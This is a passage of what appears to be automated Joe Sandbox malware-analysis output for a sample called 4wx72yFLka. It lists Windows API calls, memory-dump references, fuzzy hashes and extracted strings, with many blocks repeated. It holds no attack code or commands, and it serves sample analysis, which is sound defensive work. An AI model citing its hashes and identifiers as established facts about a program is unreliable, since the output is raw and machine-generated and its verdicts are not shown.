                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: cc6b993a7d442d87fa38530c9f675aebc1ec802b311f287ccb55d2307cda23d5
                                                            • Instruction ID: 09d370f7049323c732ea55c3bcac030afee705212b2b296dd8e35001ebd6a288
                                                            • Opcode Fuzzy Hash: cc6b993a7d442d87fa38530c9f675aebc1ec802b311f287ccb55d2307cda23d5
                                                            • Instruction Fuzzy Hash: 76B012A225E802BD36141140DD06C3F011CC7C0F63330C83BFE11CC0819A4C4C4A0031
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 16f87fe30a6f4aedbd8098796655f036ef119b9b951679251874ae0ab4b2db87
                                                            • Instruction ID: 2c3c05445eea42fd42fd167ef4bdd2c47391b64f1ea07507ac3c954259e801f6
                                                            • Opcode Fuzzy Hash: 16f87fe30a6f4aedbd8098796655f036ef119b9b951679251874ae0ab4b2db87
                                                            • Instruction Fuzzy Hash: 36A002A655D543FC75545251AD06C7F022CC7C4F523308D3EF916840959D4858595435
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6c2ae2a93a4ead5d2df183ff745cd5e0c9147d6c5c33170860295f5814d2db93
                                                            • Instruction ID: 2c3c05445eea42fd42fd167ef4bdd2c47391b64f1ea07507ac3c954259e801f6
                                                            • Opcode Fuzzy Hash: 6c2ae2a93a4ead5d2df183ff745cd5e0c9147d6c5c33170860295f5814d2db93
                                                            • Instruction Fuzzy Hash: 36A002A655D543FC75545251AD06C7F022CC7C4F523308D3EF916840959D4858595435
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F3D6
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F3D6
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F3D6
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F3D6
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F3D6
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F3D6
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F4F9
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F4F9
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F4F9
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F4F9
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F55A
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F55A
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 33940f74cebcd52b1da01433266c06610a4bba914b30062d1d18361722e0c3fb
                                                            • Instruction ID: bc8421ac03417a44d8a12080c7caddb964a92fbc82f6564906d79904bd7c7ae6
                                                            • Opcode Fuzzy Hash: 33940f74cebcd52b1da01433266c06610a4bba914b30062d1d18361722e0c3fb
                                                            • Instruction Fuzzy Hash: ACA012A115C5037C300412005C02C3F011CC6C0F123308C3AF912840816D4808490031
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F55A
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 93dca4c92b5b66e2ebbe41b5328e949608ff2f86b4971da63675f0bdfd4519c1
                                                            • Instruction ID: bc8421ac03417a44d8a12080c7caddb964a92fbc82f6564906d79904bd7c7ae6
                                                            • Opcode Fuzzy Hash: 93dca4c92b5b66e2ebbe41b5328e949608ff2f86b4971da63675f0bdfd4519c1
                                                            • Instruction Fuzzy Hash: ACA012A115C5037C300412005C02C3F011CC6C0F123308C3AF912840816D4808490031
                                                            APIs
                                                            • SetEndOfFile.KERNELBASE(?,0004A061,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000,0004920F,-00008E00), ref: 0004B17C
                                                            Similarity
                                                            • API ID: File
                                                            • String ID:
                                                            • API String ID: 749574446-0
                                                            • Opcode ID: 05bbcefdfc3d89f4ebc5ff61fed5e2a95f20e359ffd36144db68b2c3440d54ad
                                                            • Instruction ID: df3e3fad131ea44c379f5e5e7cc517b6c04349d2336e8d7de143bffb1107d0be
                                                            • Opcode Fuzzy Hash: 05bbcefdfc3d89f4ebc5ff61fed5e2a95f20e359ffd36144db68b2c3440d54ad
                                                            • Instruction Fuzzy Hash: 4DA01230440009869D001730D90440C7710F7107C03000194500ACA061C72A44578A00
                                                            APIs
                                                              • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
                                                              • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0005D331
                                                            • EndDialog.USER32(?,00000006), ref: 0005D344
                                                            • GetDlgItem.USER32(?,0000006C), ref: 0005D360
                                                            • SetFocus.USER32(00000000), ref: 0005D367
                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 0005D3A1
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0005D3D8
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0005D3EE
                                                              • Part of subcall function 0005BBFB: FileTimeToSystemTime.KERNEL32(?,?), ref: 0005BC0F
                                                              • Part of subcall function 0005BBFB: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0005BC20
                                                              • Part of subcall function 0005BBFB: SystemTimeToFileTime.KERNEL32(?,?), ref: 0005BC2E
                                                              • Part of subcall function 0005BBFB: FileTimeToSystemTime.KERNEL32(?,?), ref: 0005BC3C
                                                              • Part of subcall function 0005BBFB: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0005BC57
                                                              • Part of subcall function 0005BBFB: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 0005BC7E
                                                              • Part of subcall function 0005BBFB: _swprintf.LIBCMT ref: 0005BCA4
                                                            • _swprintf.LIBCMT ref: 0005D437
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0005D44A
                                                            • FindClose.KERNEL32(00000000), ref: 0005D451
                                                            • _swprintf.LIBCMT ref: 0005D4A0
                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 0005D4B3
                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0005D4D0
                                                            • _swprintf.LIBCMT ref: 0005D503
                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0005D516
                                                            • _swprintf.LIBCMT ref: 0005D560
                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 0005D573
                                                              • Part of subcall function 0005BFAF: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0005BFD5
                                                              • Part of subcall function 0005BFAF: GetNumberFormatW.KERNEL32(00000400,00000000,?,0008072C,?,?), ref: 0005C024
                                                            Strings
                                                            Similarity
                                                            • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
                                                            • String ID: %s %s$REPLACEFILEDLG
                                                            • API String ID: 3464475507-439456425
                                                            • Opcode ID: b73283d24f21d8d8e1d0fc991c54fb9744bdf64ffdb913106c6276eb74627afb
                                                            • Instruction ID: 5776599f30e2e8e5948bbc3f3634d2593244cd6ca545b17cc7f15cf1e3bba38c
                                                            • Opcode Fuzzy Hash: b73283d24f21d8d8e1d0fc991c54fb9744bdf64ffdb913106c6276eb74627afb
                                                            • Instruction Fuzzy Hash: 3C71A5B25447047BE3319B60DC49FFF77ECEB8A702F04042ABA49D6091D7759A088B63
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00047A94
                                                            • _wcslen.LIBCMT ref: 00047AFD
                                                            • _wcslen.LIBCMT ref: 00047B6E
                                                              • Part of subcall function 000486E4: GetCurrentProcess.KERNEL32(00000020,?), ref: 000486F3
                                                              • Part of subcall function 000486E4: GetLastError.KERNEL32 ref: 00048739
                                                              • Part of subcall function 000486E4: CloseHandle.KERNEL32(?), ref: 00048748
                                                              • Part of subcall function 0004B450: DeleteFileW.KERNELBASE(?,00000000,?,0004A416,?,?,?,?,0004890B,?,?,?,0007365F,000000FF), ref: 0004B461
                                                              • Part of subcall function 0004B450: DeleteFileW.KERNEL32(?,?,?,00000800,?,0004A416,?,?,?,?,0004890B,?,?,?,0007365F,000000FF), ref: 0004B48F
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00047C23
                                                            • CloseHandle.KERNEL32(00000000), ref: 00047C3F
                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00047D8B
                                                              • Part of subcall function 0004B012: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00047EB0,?,?,?,00000000), ref: 0004B02C
                                                              • Part of subcall function 0004B012: SetFileTime.KERNELBASE(?,?,?,?), ref: 0004B0E0
                                                              • Part of subcall function 0004A860: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0004A81B,?,?,?,?,?,0007365F,000000FF), ref: 0004A87B
                                                              • Part of subcall function 0004B8C6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0004B595,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B8DA
                                                              • Part of subcall function 0004B8C6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004B595,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B90B
                                                            Strings
                                                            Similarity
                                                            • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 2821348736-3508440684
                                                            • Opcode ID: 45a1f348608f573c6fdde8686452bd852c7785790ad24f4407c424479876993e
                                                            • Instruction ID: 0cf831827d0a2eb8436adf57e85d047d286567f81a21c4b6b7d881bbd2188222
                                                            • Opcode Fuzzy Hash: 45a1f348608f573c6fdde8686452bd852c7785790ad24f4407c424479876993e
                                                            • Instruction Fuzzy Hash: 60C1B6B1D04249AAEB21DB64CC45FEEB3ACFF08304F04456AF549E7142DB74EA44CBA5
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: bdc3c7e141e188fcadbe4dc8e3d525892f6a8c212b459d5cea044b1319a1481a
                                                            • Instruction ID: f364ddd6af7e22013c976f40b71e7e994d03c8e4aa7de085ce109afefc9f12e5
                                                            • Opcode Fuzzy Hash: bdc3c7e141e188fcadbe4dc8e3d525892f6a8c212b459d5cea044b1319a1481a
                                                            • Instruction Fuzzy Hash: 20C24872E086298FDB65CE28DD407EAB7F6EB44314F1441EAD84DE7241E779AE818F40
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: H_prolog_swprintf
                                                            • String ID: CMT$h%u$hc%u
                                                            • API String ID: 146138363-3282847064
                                                            • Opcode ID: 4f4f70dfae8b1a95049c2d17f251dda876981a3b85aa33aa7575a2d63d3f1a96
                                                            • Instruction ID: 8b3e24d09ea985a77f0bb7098a3bb82e052ea3f0949d87d0277588ab46649eb0
                                                            • Opcode Fuzzy Hash: 4f4f70dfae8b1a95049c2d17f251dda876981a3b85aa33aa7575a2d63d3f1a96
                                                            • Instruction Fuzzy Hash: B942E3B16006849FDF24DF34C895BEA3BE5AF15300F444479FC4A8B287EB749A89CB65
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00042EBF
                                                            • _strlen.LIBCMT ref: 0004348B
                                                              • Part of subcall function 000515D9: __EH_prolog.LIBCMT ref: 000515DE
                                                              • Part of subcall function 00052EA2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0004CEF8,00000000,?,?), ref: 00052EBE
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000435DD
                                                            Strings
                                                            Similarity
                                                            • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                            • String ID: CMT
                                                            • API String ID: 1206968400-2756464174
                                                            • Opcode ID: 0ccfc5e22a26f1888c5f217ad3d88c3c7c01df50ae4756c43aa48cb03c73cb86
                                                            • Instruction ID: c9507cd884cfba4a0417241893dd3a5d2e0c830d51c2db37d4b89b2feb59ba77
                                                            • Opcode Fuzzy Hash: 0ccfc5e22a26f1888c5f217ad3d88c3c7c01df50ae4756c43aa48cb03c73cb86
                                                            • Instruction Fuzzy Hash: 2C6238B16006848FDF29DF38C8956EA3BE1AF55304F08457EFC5A8B287DB749A49CB14
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00060866
                                                            • IsDebuggerPresent.KERNEL32 ref: 00060932
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00060952
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0006095C
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: f9c804adc9186af125a543f7c1dd9a9514096ed3e1d702673b1f4b31e198eb43
                                                            • Instruction ID: 03e243546933e3387e976a0447f20573314c0cd1d1ff51f274d73d9715294484
                                                            • Opcode Fuzzy Hash: f9c804adc9186af125a543f7c1dd9a9514096ed3e1d702673b1f4b31e198eb43
                                                            • Instruction Fuzzy Hash: 8E313875D45318DBEB10EFA0DD897CDBBF8AF08301F1041AAE40CAB251EB759A848F55
                                                            APIs
                                                            • VirtualQuery.KERNEL32(80000000,0005F5C2,0000001C,0005F7B7,00000000,?,?,?,?,?,?,?,0005F5C2,00000004,000A3D24,0005F847), ref: 0005F68E
                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0005F5C2,00000004,000A3D24,0005F847), ref: 0005F6A9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00064F37
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00064F41
                                                            • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00064F4E
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0005BFD5
                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,0008072C,?,?), ref: 0005C024
                                                            APIs
                                                            • GetLastError.KERNEL32(00047866,?,00000400), ref: 00047707
                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00047728
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,000729FF,?,?,00000008,?,?,0007269F,00000000), ref: 00072C31
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0006068C
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 0004C368
                                                              • Part of subcall function 0004C3D7: __EH_prolog.LIBCMT ref: 0004C3DC
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00020A00,00060455), ref: 000609F2
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: 0a60c8a4e75dba4272d4ddcb371cf65324b7c43042ccb89b2952ad6ea5d1bbd8
                                                            • Instruction ID: 21b6ff365530ba9daf2584a54ec5499e2c7cada4ce965fa7f887d06fadcc5516
                                                            • Opcode Fuzzy Hash: 0a60c8a4e75dba4272d4ddcb371cf65324b7c43042ccb89b2952ad6ea5d1bbd8
                                                            • Instruction Fuzzy Hash: 48A022B0A02280CFB3008F38AF8830C3BE8EB832C030A0028E00CC0030EB3C80E0AB02
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0005D706
                                                              • Part of subcall function 0005C3A4: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0005C48B
                                                            • _wcslen.LIBCMT ref: 0005D9CC
                                                            • _wcslen.LIBCMT ref: 0005D9D5
                                                            • SetWindowTextW.USER32(?,?), ref: 0005DA33
                                                            • _wcslen.LIBCMT ref: 0005DA75
                                                            • _wcsrchr.LIBVCRUNTIME ref: 0005DBBD
                                                            • GetDlgItem.USER32(?,00000066), ref: 0005DBF8
                                                            • SetWindowTextW.USER32(00000000,?), ref: 0005DC08
                                                            • SendMessageW.USER32(00000000,00000143,00000000,0009389A), ref: 0005DC16
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0005DC41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 2804936435-312220925
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 0004F60E
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                              • Part of subcall function 000530C5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00083070,?,0004EC28,00000000,?,00000050,00083070), ref: 000530E2
                                                            • _strlen.LIBCMT ref: 0004F62F
                                                            • SetDlgItemTextW.USER32(?,00080274,?), ref: 0004F68F
                                                            • GetWindowRect.USER32(?,?), ref: 0004F6C9
                                                            • GetClientRect.USER32(?,?), ref: 0004F6D5
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0004F775
                                                            • GetWindowRect.USER32(?,?), ref: 0004F7A2
                                                            • SetWindowTextW.USER32(?,?), ref: 0004F7DB
                                                            • GetSystemMetrics.USER32(00000008), ref: 0004F7E3
                                                            • GetWindow.USER32(?,00000005), ref: 0004F7EE
                                                            • GetWindowRect.USER32(00000000,?), ref: 0004F81B
                                                            • GetWindow.USER32(00000000,00000002), ref: 0004F88D
                                                            Strings
                                                            Similarity
                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                            • String ID: $%s:$CAPTION$d
                                                            • API String ID: 2407758923-2512411981
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 0006DB76
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D72E
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D740
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D752
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D764
                                                              • Part of subcall function 0006D711: _free.LIBCMT ref: 0006D776
